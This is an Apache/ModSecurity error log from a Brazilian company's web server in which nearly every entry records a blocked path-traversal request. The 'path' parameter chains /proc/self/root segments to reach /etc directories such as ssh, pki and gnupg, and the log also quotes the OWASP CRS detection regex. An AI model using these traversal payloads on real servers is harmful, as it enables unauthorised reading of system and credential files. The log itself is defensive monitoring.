https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:12.295036 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:39056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzerAkwaGbbGflqUZAKzQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:12.965258 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:46432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzerAkwaGbbGflqUZAKzgAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:13.129961 2026] [proxy_fcgi:error] [pid 30424:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56720] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:44:15.284375 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:39066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzerhCii7xarUs8iHYogwAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:15.285572 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:46438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzer_u8EFLIOrSqIpvlVAAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:16.622522 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:39082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzesNa6ubjKNq_cu4aUVQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:17.342613 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:43418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzesQkwaGbbGflqUZAK1wAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:17.577298 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:43418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzesQkwaGbbGflqUZAK2AAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:18.748438 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:39084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzesta6ubjKNq_cu4aUWAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:19.479644 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:43422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzesxCii7xarUs8iHYohAAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:20.595417 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:39084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzetNa6ubjKNq_cu4aUXQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:21.554270 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:43426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzetda6ubjKNq_cu4aUYAAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:23.582581 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.241.31:43438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzetxCii7xarUs8iHYohQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:23.592567 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:55308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzetuoXxyEfFpUF8f9KkAAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:24.939743 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:43452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeuPXLqtnMIWvjpaJdqgAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:28.508381 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:58758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzevBCii7xarUs8iHYoiQAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:28.971198 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:55318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzevBCii7xarUs8iHYoigAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:32.739019 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:58770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzewPu8EFLIOrSqIpvlWgAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:33.516779 2026] [:error] [pid 30424:tid 140411599251200] [client 74.7.243.128:49184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzewct36Dv4L1GW-s-efwAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:35.125811 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57354] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:44:37.671148 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:48862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzexeoXxyEfFpUF8f9KmwAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:38.768215 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:49190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzexvqxLDW4GITHUkSovwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:44:41.158725 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.241.31:48876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeyRCii7xarUs8iHYokAAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:44:41.410146 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:48876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeyRCii7xarUs8iHYokQAAAgY"], referer: 